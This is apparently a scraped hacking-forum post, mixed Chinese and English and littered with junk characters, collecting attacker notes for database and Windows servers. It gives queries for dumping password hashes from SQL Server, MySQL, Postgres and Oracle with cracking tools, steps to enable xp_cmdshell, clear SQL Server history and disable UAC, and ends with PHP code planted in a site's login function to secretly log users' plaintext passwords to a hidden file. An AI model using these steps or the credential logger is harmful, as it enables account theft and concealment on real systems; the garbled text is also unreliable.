r5 R* P* x: h# w# k0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341- C+ T9 ~5 k! f
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
' L& [- e- {8 b m5 o. t3 D& f, q* [# ~" R
0×0100- constant header n. b- U( c2 E/ U$ E. y( X# E
34767D5C- salt
5 f; L; }: s' ~# z) Z6 q0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
( q5 R" g0 x5 i" ~2 H! u1 y4 ~2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
9 j* o% P- [% x4 Scrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
_3 N, \: r0 O5 e' ESQL server 2005:-
^4 N8 F: X/ p4 z1 A2 @6 NSELECT password_hash FROM sys.sql_logins where name='sa'
" q7 s" C1 C+ ]1 f7 j& a0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
& ^' |& t% x2 R" r% Q- z) ~0×0100- constant header
! W7 q: f. K# }$ U( e0 I993BF231-salt* y5 s. ]1 T2 L3 L0 i
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash; ^. c6 f$ O3 {' i# ?5 g+ G
crack case sensitive hash in cain, try brute force and dictionary based attacks.
. Q, p1 h, |& w2 s& S8 C% W4 H) l0 E& Q( O, u$ U
update:- following bernardo’s comments:-
8 [& g# Z# }4 T) K3 yuse function fn_varbintohexstr() to cast password in a hex string.$ t7 B r% x9 m
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins: f- ~" G, x8 v7 u
+ ], x+ Z1 ^" D( LMYSQL:-
: j5 w7 g/ M& M& h# P8 @+ r# d. m/ S t+ ?
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2. ~% S0 `4 t9 W# T; q+ x
. }5 L( S2 h/ M3 @5 N( N! q+ }
*mysql < 4.1! Q; n# Y6 \0 N5 r& @: i& f4 J
+ h: t$ D) o/ A) h& Rmysql> SELECT PASSWORD(‘mypass’);' a) y0 R1 X# \: U- y4 w% P, z7 _
+——————–+$ N& r O8 Q4 G2 k
| PASSWORD(‘mypass’) |
* I* U; T( M+ q }9 H& U. f$ U5 o+——————–+
6 ]1 e {! M" Y) M! s| 6f8c114b58f2ce9e |/ c2 b; A- N9 }# F* s. q
+——————–+% Z/ f* N c8 C3 O+ h8 }
! ?( T; B3 Y. H7 v, s$ Q*mysql >=4.1' w# ~5 U2 U5 ~6 Y6 k: C
) j9 @" k$ ?% F( ~2 i0 a5 e+ u
mysql> SELECT PASSWORD(‘mypass’);& q7 P; O, b; M/ ~$ s( }
+——————————————-+
' J4 W( x _+ b| PASSWORD(‘mypass’) |
) J- m, Y. X2 M; v$ n- F1 W+——————————————-+! o5 d' B: C* R
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |; H, f! u! a4 O1 e7 t/ P6 c! x
+——————————————-+6 ~( E5 V# ?7 y6 @ o
1 i0 l; w; J( J7 D( X, o* cSelect user, password from mysql.user
: }* V, g2 [5 \) F: a9 g7 n! zThe hashes can be cracked in ‘cain and abel’
& |- G9 r5 A4 P/ X8 T- j l1 | T4 ]
Postgres:-' H6 i# F6 z8 d
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)6 w& R# ^6 @ x! `
select usename, passwd from pg_shadow;
) E5 M% i, a! y6 P/ [4 u2 Pusename | passwd& Q; T# [' n& P5 A K( g
——————+————————————-3 X( W, x" c4 E. o2 U- d d2 x0 E' _
testuser | md5fabb6d7172aadfda4753bf0507ed4396
7 M* { Y$ u9 U; n8 L3 ?! R1 y4 w3 D |use mdcrack to crack these hashes:-
2 |: W) ?, d5 o" N! x" U$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
1 d& ]: p; f. I C# m2 e5 Q
$ n9 E+ b+ Y) p8 j4 e- ]- c8 AOracle:-
8 ]7 u+ T% [9 A3 ^select name, password, spare4 from sys.user$
* P* h- x7 @5 t- m/ Ihashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g2 M; T0 g( l6 {( U* s4 S" v
More on Oracle later, i am a bit bored….
( g1 A: I- ?) s# ?" L- J2 P& D |# p/ l+ _% [
. X3 X/ R0 M3 o: Q+ U4 o& g- U在sql server2005/2008中开启xp_cmdshell4 q1 c" B* d. x! P4 v4 K8 h3 H
-- To allow advanced options to be changed.
% C6 E% y0 }: p% x5 LEXEC sp_configure 'show advanced options', 1
7 T: N+ `$ y4 u( x8 IGO9 ?! v6 t- X; C# R1 B
-- To update the currently configured value for advanced options.% R2 G8 p7 U2 s9 V0 [) w
RECONFIGURE
7 |, L8 K. K- f' L# Q; ^3 Z. n0 YGO4 K: a1 B: i' t' @& p+ f, x
-- To enable the feature.; Y! c1 m2 c- Z. q! D$ P9 P8 d7 o; e
EXEC sp_configure 'xp_cmdshell', 1
e" g2 E+ I7 Q6 n2 mGO$ r: i0 w- N1 {# F+ G$ P. @) t
-- To update the currently configured value for this feature.
& P2 f; W$ `# O1 x7 o& O3 IRECONFIGURE/ T% o- n* w! m5 w7 z7 y+ k2 A; ^/ k
GO2 B8 ]/ x) ]; m4 |/ z9 \! b, g
SQL 2008 server日志清除,在清楚前一定要备份。
- _/ y( O/ S6 i如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
6 O! M, _" u* F2 b0 GX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin, P# n. z7 A3 O7 l4 U
; d3 Y% o# U/ q; ^+ e+ U对于SQL Server 2008以前的版本:9 L3 ^* h9 S7 G; H1 `
SQL Server 2005:
6 e. ? m5 w$ u8 ?删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat% K: c$ ]0 f! O% u* y9 W
SQL Server 2000:
7 R# W T4 i! v3 `2 Q/ ?清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。( t+ ~9 ] b5 C/ t3 i' }( a
' ]; E- f3 n' ?" ]
本帖最后由 simeon 于 2013-1-3 09:51 编辑
! F2 k3 E. q% q; `; j
9 x# U9 @) p, w8 W Z' ]" M' q) w& G
7 W2 _" S8 ?' Y: H, J: jwindows 2008 文件权限修改' d6 _5 k2 h8 E4 l5 H Y/ D
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2 Y9 V/ D1 ]. f! w2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
+ B' `: I) z3 f( x2 e8 c2 m! o! h一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,5 ~8 j3 F: D' i [$ I
9 t1 A/ [" [" u3 tWindows Registry Editor Version 5.00) n4 N1 |: @$ X, ^+ ]
[HKEY_CLASSES_ROOT\*\shell\runas]' V: `9 t' a: Q% I+ v+ }
@="管理员取得所有权"0 R4 ^# \5 W1 l- S1 ~
"NoWorkingDirectory"=""6 D& V# w# R; s& g$ j
[HKEY_CLASSES_ROOT\*\shell\runas\command]
9 x a; W8 }8 R0 n3 k K@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 R p, k, h5 i- K2 U
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 B/ L- J0 x+ W, K- P[HKEY_CLASSES_ROOT\exefile\shell\runas2]
7 C/ l! p/ g; F! }@="管理员取得所有权"/ W$ e' n, ?/ e( t j* h- o
"NoWorkingDirectory"=""- V$ S0 {) | x, U# O; n0 N; }& H0 g
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
W, l8 F- p% G( V2 f8 {@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
; L! p/ ]8 X+ ?& V: `4 C"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" E' T/ h+ Q) s# Z/ m6 h! b9 x7 q% M" E+ R% N# g5 p' L, N
[HKEY_CLASSES_ROOT\Directory\shell\runas]; f8 x, z9 u2 Z9 @
@="管理员取得所有权"
; C! X, h5 i* L# o/ _; I' y"NoWorkingDirectory"=""
. m1 a" `8 r& L3 }* Q[HKEY_CLASSES_ROOT\Directory\shell\runas\command]2 v6 J9 ?3 k4 B+ L( K/ S# K/ X
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
) O9 ]* u2 q2 [3 ?- }! f"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"' M# ` @8 U# b6 Z8 r; K8 T
. [7 B1 u* d" T, A2 ?/ s
5 u: \1 ?# G0 O& j1 L5 H3 Fwin7右键“管理员取得所有权”.reg导入+ z! m& M1 ~6 T8 U! b
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
* r8 v4 y/ p7 l1 A+ r1、C:\Windows这个路径的“notepad.exe”不需要替换
1 A5 B0 C H/ C* w2、C:\Windows\System32这个路径的“notepad.exe”不需要替换# ^' O! X& Z3 g) V: X, D
3、四个“notepad.exe.mui”不要管# n! ?( Y8 X8 t9 [+ T3 Y4 J2 R
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
3 y" N+ L+ K" I5 Y- i3 r+ zC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
; b( p% l+ {- @8 d( r替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
2 @0 s8 k( b. g8 k替换完之后回到桌面,新建一个txt文档打开看看是不是变了。5 U6 A7 X( S j2 ~+ p2 X/ F: f( K, `
windows 2008中关闭安全策略: ; O' z' @7 g1 L$ F2 b$ D
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f V8 |% y( V2 o6 E
修改uc_client目录下的client.php 在
' y6 U9 R d& c/ p) |" ]9 @function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
n& r# L1 U9 @$ _下加入如上代码,在网站./data/cache/目录下自动生成csslog.php" S! W8 i, \" u* x+ E7 h. T/ Z! \
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw9 y2 W' [2 G/ @1 }: D. a
if(getenv('HTTP_CLIENT_IP')) {
/ i% G0 P, J; c$onlineip = getenv('HTTP_CLIENT_IP');, t$ c. y* C7 u0 k+ M
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {, n- f3 I: a& W% W
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
6 n, ~) q& w$ v( P3 j2 Q9 L3 J} elseif(getenv('REMOTE_ADDR')) {
' l4 U/ S6 W- R" n, f$onlineip = getenv('REMOTE_ADDR');( A2 r' O+ u+ U
} else {
$ `# [$ u3 _ x, Y$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
% W. j2 I2 D5 }+ A}: n8 t7 C& m t+ n( C+ l# k6 n
$showtime=date("Y-m-d H:i:s");
|) O5 H! L. n9 X; i h $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";+ T) P8 V- p1 H+ ?5 Z/ A
$handle=fopen('./data/cache/csslog.php','a+');& t& a! O& n/ @) `( C# I
$write=fwrite($handle,$record); |